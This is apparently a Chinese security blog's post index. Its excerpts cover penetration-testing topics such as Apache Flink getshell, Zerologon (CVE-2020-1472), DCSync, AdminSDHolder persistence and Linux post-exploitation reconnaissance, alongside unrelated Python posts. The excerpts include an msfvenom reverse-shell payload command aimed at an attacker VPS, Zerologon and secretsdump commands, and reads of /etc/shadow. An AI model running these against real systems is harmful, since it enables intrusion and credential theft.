- 博客(16)
- 资源 (20)
- 收藏
- 关注
RSS订阅原创 Vmware虚拟化
在红蓝对抗过程中,在内网中经常会碰到Vmware相关的产品。如:VMware ESXi登录 vRealize Operations Manager Login | Appliance Management vSphere Web Client相关文章:安装ESXi
2020-10-27 09:16:42
4125
原创 Apache Flink任意Jar包上传getshell
Apache FlinkApache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。此外,Flink的运行时本身也支持迭代算法的执行msfvenom -p java/shell_reverse_tcp LHOST=VPS的ip地址 LPORT=34567 -f jar > test.jar漏洞描述近日,有安全研
2020-10-27 08:28:29
2389
原创 解除445端口的占用
有很多时候,我们测试的时候,会需要用到445端口。而windows默认该端口是开放的,那么我们如何关闭该端口的占用状态呢?不是通过防火墙阻止445端口的连接来关闭,这种是阻止外部连接,但是本地445端口还是开放的。我们这里讲的是关闭占用445端口的服务!关闭Server服务打开cmd,执行:services.msc打开服务窗口然后重启机器就可以看到445端口已经没有占用了。...
2020-10-18 22:35:39
4438
1
原创 域控权限持久化之AdminSDHolder权限维持
SDProp与AdminSDHolder受保护对象(通常是一些特权内置账号如Domain Admins、Enterprise Admins等)被系统安全策略保护,以避免这些特权对象被恶意修改或滥用(防止被删除、修改权限等)。每一个被保护的对象由SDProp进程(Security Descriptor Propagation)监控保护,SDProp进程每60分钟运行一次,运行时检查受保护对象的安全描述符,检查将依照AdminSDHolder容器的ACL,如果受保护对象的ACL配置与AdminSDHolde
2020-10-13 11:05:32
1338
1
原创 域中的组策略(Group Policy)
组策略 组策略是Windows环境下用户管理对象的一种手段。组策略分为本地组策略和组策略。本地组策略适合于管理独立的未加入域的工作组的机器。而组策略则是用于管理域环境中的对象;本文主要讲解域环境中的组策略。关于本地组策略,传送门: 域环境中通过配置组策略可以对域中的用户、用户组、计算机进行不同维度的管理;如安全配置、注册表配置、软件安装配置、开关机与登入登出管理等。配置的组策略通过关联到站点、域、组织单位上来在不同层级上应用不同的策略配置。组策略配置分为两部分,分别是计算机配置和...
2020-10-13 10:36:37
5326
1
原创 CVE-2020-1472NetLogon权限提升漏洞
目录impacket攻击挂socks5代理打使用mimikatz攻击恢复域控的机器用户哈希获得域控机器账号原始哈希方式一 :方式二:恢复域控原始哈希impacket攻击先执行如下命令判断域控是否存在该漏洞python3 zerologon_tester.py win2008 192.168.10.131该脚本会将域控的机器账号哈希置为空#查询域控的机器用户哈希./secretsdump.py xie.com/administrator:p..
2020-10-12 16:21:06
2812
原创 ACL(Access Control List)访问控制列表
ACL访问控制列表ACL(Access Control List)是Windows环境中访问控制模型的重点,用来表示用户(组)权限的列表。ACL微软官方文档:https://docs.microsoft.com/en-us/windows/desktop/SecAuthZ/access-control-lists简单来说,访问控制是指某主体(subject)允许或不被允许对某实体(object)执行读取、写入、删除、更改等操作。在Windows中,subject通常是进程,object是指安全对
2020-10-12 11:06:44
2646
原创 配置夜神模拟器抓包
在渗透测试中,经常会碰到需要测试app的情况。用手机测试则会很不方便,所以我们一般都会用模拟器来安装app测试。这里我们使用的是夜伸模拟器。安装好夜伸模拟器后,我们如何配置模拟器,使burp能抓取到模拟器内app的数据包呢?burp配置首先,配置burp,这里先用ipconfig查看当前的ip地址(wifi或网线的地址),然后配置完成即可模拟器配置我们打开设置——>WLAN,然后长按WiredSSID——>修改网络高级选项——>代理——>手动
2020-10-10 22:34:16
7916
6
原创 域渗透之Dcsync
在DCSync功能出现之前,要想获得域用户的哈希,需要登录域控制器,在域控制器上执行代码才能获得域用户的哈希。2015年8月,新版的mimikatz增加了DCSync的功能,该功能可以模仿一个域控DC,从真实的域控中请求数据,如用户的哈希。该功能最大的特点就是可以实现不登录到域控而获取域控上的数据。在域中,不同的DC之间,每隔15分钟会进行一次域数据的同步。当一个DC(辅助DC)想从其他DC(主DC)获取数据时,辅助DC会向主DC发起一个GetNCChanges请求。请求的数据包括需要同步的数据。如果需
2020-10-09 23:49:17
3550
原创 后渗透之Linux信息收集
whoami #查看当前用户身份uname -a #查看系统信息history #查看命令历史,有可能可以查看到管理员的一些重要命令,包括密码等last #查看登录历史cat /etc/passwd #查看用户cat /etc/shadow #查看密码traceroute baidu.comcat /etc/hosts #查看hosts文件cat /etc/resolv.conf #查看dns信息...
2020-10-09 15:36:32
3103
1
原创 WindowsServer2008R2安装Exchange Server2010
首先,Windows Server2008R2需要加入域环境中,我这里Windows Server 2008R2就是域控,在域控上安装Exchange服务。以管理员权限打开PowerShell,执行以下命令import-Module ServerManagerAdd-WindowsFeature NET-Framework,RSAT-ADDS,Web-Server,Web-Basic-Auth,Web-Windows-Auth,Web-Metabase,Web-Net-Ext,Web-Lgcy
2020-10-08 20:54:13
2158
原创 Web开发介绍
如今,网站变得越来越流行。无论是大公司还是小公司,或者是提供其他服务的公司,都有自己的网站。随着网站的流行,开发网站的技术也犹如春笋一般涌起。所以,我特意总结了下网站开发的一些技术。网站开发可分为前端开发和后端开发。前端主要包括:HTML 、CSS 、JavaScript技术。基于JavaScript的框架包:jQuery:JavaScript包,它封装JavaScript常用的...
2020-10-06 22:56:11
2147
原创 Python中的PIL库
PIL/PillowPIL(Python Image Library)是Python的第三方图像处理库,功能强大,使用人数众多。PIL历史悠久,原来是只支持 python2.x 的版本,后来出现了移植到python3的库Pillow,其功能和PIL差不多,但是支持python3。PIL和Pillow的调用都是 import PIL。所以,以下Pillow称为PIL,因为我的环境是pytho...
2020-10-06 22:54:33
10538
转载 python3中的协程
在python GIL之下,同一时刻只能有一个线程在运行,那么对于CPU计算密集的程序来说,线程之间的切换开销就成了拖累,而以I/O为瓶颈的程序正是协程所擅长的。协程,又称为微线程,它是实现多任务的另一种方式,只不过是比线程更小的执行单元。因为它自带CPU的上下文,这样只要在合适的时机,我们可以把一个协程切换到另一个协程。通俗的理解:在一个线程中的某个函数中,我们可以在任何地方保存当前函数的一些临时变量等信息,然后切换到另外一个函数中执行,注意不是通过调用函数的方式做到的,并且切换的次数以及什...
2020-10-06 22:53:12
2456
原创 python3中解析json的模块
json模块是python中用来解析json数据格式的模块。json中有两种数据结构:对象和数组。对象:用大括号表示,由键值对组成,每个键值对用逗号隔开。其中key必须为字符串且是双引号,value可以是多种数据类型。 数组:用中括号表示,每个元素之间用逗号隔开。json中的字符串都要用双括号表示,json数据可以嵌套出结构更加复杂的数据。函数 描述 json.dumps 将 Python 对象编码成 JSON 字符串 json.loads 将已编码的 JSON
2020-10-06 19:05:43
2094
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人